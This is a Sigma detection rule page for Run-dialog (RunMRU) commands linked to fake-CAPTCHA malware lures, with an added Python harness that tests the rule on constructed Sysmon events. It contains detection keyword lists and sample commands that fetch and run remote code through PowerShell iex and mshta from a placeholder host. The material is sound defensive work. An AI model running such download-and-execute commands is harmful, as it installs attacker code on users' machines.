Potentially Suspicious Command Executed Via Run Dialog Box - Registry
Detects execution of commands via the Run dialog box (Win+R) on Windows by checking the values written to the "RunMRU" registry key (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU), which Explorer updates with each command the user submits; with Sysmon, these writes arrive as Event ID 13 (registry value set), the source behind the rule's registry_set category. This technique was seen being abused by threat actors to deceive users into pasting and executing malicious commands, often disguised as CAPTCHA verification steps.
Sigma rule
title: Potentially Suspicious Command Executed Via Run Dialog Box - Registry
id: a7df0e9e-91a5-459a-a003-4cde67c2ff5d
related:
    - id: f9d091f6-f1c7-4873-a24f-050b4a02b4dd
      type: derived
status: test
description: |
    Detects execution of commands via the run dialog box on Windows by checking values of the "RunMRU" registry key.
    This technique was seen being abused by threat actors to deceive users into pasting and executing malicious commands, often disguised as CAPTCHA verification steps.
references:
    - https://medium.com/@ahmed.moh.farou2/fake-captcha-campaign-on-arabic-pirated-movie-sites-delivers-lumma-stealer-4f203f7adabf
    - https://medium.com/@shaherzakaria8/downloading-trojan-lumma-infostealer-through-capatcha-1f25255a0e71
    - https://www.forensafe.com/blogs/runmrukey.html
    - https://redcanary.com/blog/threat-intelligence/intelligence-insights-october-2024/
author: Ahmed Farouk, Nasreddine Bencherchali
date: 2024-11-01
tags:
    - attack.execution
    - attack.t1059.001
logsource:
    product: windows
    category: registry_set
detection:
    selection_key:
        TargetObject|contains: '\Microsoft\Windows\CurrentVersion\Explorer\RunMRU'
    selection_powershell_command:
        Details|contains:
            - 'powershell'
            - 'pwsh'
    selection_powershell_susp_keywords:
        Details|contains:
            - ' -e '
            - ' -ec '
            - ' -en '
            - ' -enc '
            - ' -enco'
            - 'ftp'
            - 'Hidden'
            - 'http'
            - 'iex'
            - 'Invoke-'
    selection_wmic_command:
        Details|contains: 'wmic'
    selection_wmic_susp_keywords:
        Details|contains:
            - 'shadowcopy'
            - 'process call create'
    condition: selection_key and (all of selection_powershell_* or all of selection_wmic_*)
falsepositives:
    - Unknown
level: high
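To see what the condition above actually fires on, the following Python re-implements the rule's matching logic and runs it over a handful of constructed Sysmon Event ID 13 records. This is an added example, not code from SigmaHQ or the rule authors, and not a Sigma backend: it reproduces only the case-insensitive `contains` modifier and the `condition` line, with the keyword lists copied from the rule. The user SID, the RunMRU value data and the captcha.example.com URL in the samples are all made up for the demonstration.

```python
"""Added example: evaluate the RunMRU Sigma rule above over constructed
Sysmon Event ID 13 (registry value set) records. Not SigmaHQ code and not a
Sigma backend; it re-implements only the case-insensitive `contains`
modifier and the rule's `condition` line."""

from typing import Dict, Iterable, List

# Keyword lists copied verbatim from the rule's selections.
RUNMRU_KEY = r"\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"
POWERSHELL_COMMAND = ("powershell", "pwsh")
POWERSHELL_SUSP = (" -e ", " -ec ", " -en ", " -enc ", " -enco",
                   "ftp", "Hidden", "http", "iex", "Invoke-")
WMIC_COMMAND = ("wmic",)
WMIC_SUSP = ("shadowcopy", "process call create")


def contains_any(value: str, needles: Iterable[str]) -> bool:
    """Sigma string matching is case-insensitive by default, and a
    `|contains` list is an OR over its entries."""
    haystack = value.lower()
    return any(needle.lower() in haystack for needle in needles)


def matches_rule(event: Dict[str, str]) -> bool:
    """condition: selection_key and
                  (all of selection_powershell_* or all of selection_wmic_*)"""
    target = event.get("TargetObject", "")
    details = event.get("Details", "")
    selection_key = contains_any(target, (RUNMRU_KEY,))
    powershell = (contains_any(details, POWERSHELL_COMMAND)
                  and contains_any(details, POWERSHELL_SUSP))
    wmic = (contains_any(details, WMIC_COMMAND)
            and contains_any(details, WMIC_SUSP))
    return selection_key and (powershell or wmic)


# Constructed Sysmon EID 13 records (not real telemetry). Explorer stores
# each Run dialog entry under a single-letter value name with the data
# suffixed by "\1"; the SID and captcha.example.com are placeholders.
HIVE = r"HKU\S-1-5-21-1111111111-2222222222-3333333333-1001"
RUNMRU = HIVE + r"\Software" + RUNMRU_KEY

SAMPLE_EVENTS: List[Dict[str, str]] = [
    # 1. fake-CAPTCHA paste: hidden window, iex, remote URL -> match
    {"TargetObject": RUNMRU + r"\a",
     "Details": 'powershell -w hidden -c "iex (irm https://captcha.example.com/verify)"\\1'},
    # 2. encoded command -> match on ' -enc '
    {"TargetObject": RUNMRU + r"\b",
     "Details": "powershell -enc SQBFAFgA\\1"},
    # 3. WMIC process creation -> match on the wmic branch
    {"TargetObject": RUNMRU + r"\c",
     "Details": 'wmic process call create "cmd /c whoami"\\1'},
    # 4. ordinary Run dialog use -> no match
    {"TargetObject": RUNMRU + r"\d",
     "Details": "notepad\\1"},
    # 5. plain interactive PowerShell, no suspicious keyword -> no match
    {"TargetObject": RUNMRU + r"\e",
     "Details": "powershell\\1"},
    # 6. same social engineering via mshta: no powershell/pwsh/wmic token -> no match
    {"TargetObject": RUNMRU + r"\f",
     "Details": "mshta https://captcha.example.com/verify.hta\\1"},
    # 7. MRUList bookkeeping value under the same key -> no match
    {"TargetObject": RUNMRU + r"\MRUList",
     "Details": "cba"},
    # 8. suspicious data but under a different Explorer key -> no match
    {"TargetObject": HIVE + r"\Software\Microsoft\Windows\CurrentVersion\Explorer\TypedPaths\url1",
     "Details": "powershell -enc SQBFAFgA\\1"},
]


def evaluate(events: Iterable[Dict[str, str]]) -> List[bool]:
    """Apply the rule to every record; True means the rule would alert."""
    return [matches_rule(event) for event in events]


if __name__ == "__main__":
    for event, hit in zip(SAMPLE_EVENTS, evaluate(SAMPLE_EVENTS)):
        print("ALERT " if hit else "      ", event["TargetObject"].rsplit("\\", 1)[-1],
              event["Details"])
```

A few things the samples make visible. Sample 1 carries a lowercase `hidden` yet still matches the rule's `'Hidden'`, because Sigma's default matching is case-insensitive. Samples 5 and 6 show the rule's shape: a record must contain a PowerShell or WMIC token *and* one of the listed keywords, so a plain `powershell` entry stays quiet and an `mshta`-based variant of the same lure is not covered by this rule at all. The `' -e '`-style entries are surrounded by spaces, so an encoded-command switch at the very end of the value (for instance `-enc` followed directly by the `\1` suffix) would not match on that keyword alone, though such commands usually also trip `http`, `iex` or `Hidden`. Finally, the rule only sees what the sensor records: Sysmon must be configured with a registry rule that includes the RunMRU key, otherwise no Event ID 13 is produced for these writes.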
Related rules
- Renamed Powershell Under Powershell Channel
- Suspicious Non PowerShell WSMAN COM Provider
- Alternate PowerShell Hosts Pipe
- Lace Tempest PowerShell Evidence Eraser
- Lace Tempest PowerShell Launcher